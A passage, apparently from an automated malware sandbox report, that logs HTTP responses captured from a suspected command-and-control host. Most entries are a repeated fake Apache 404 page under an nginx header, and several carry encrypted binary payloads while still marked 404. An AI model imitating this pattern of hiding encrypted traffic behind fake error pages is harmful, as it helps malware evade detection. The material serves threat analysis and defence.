6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 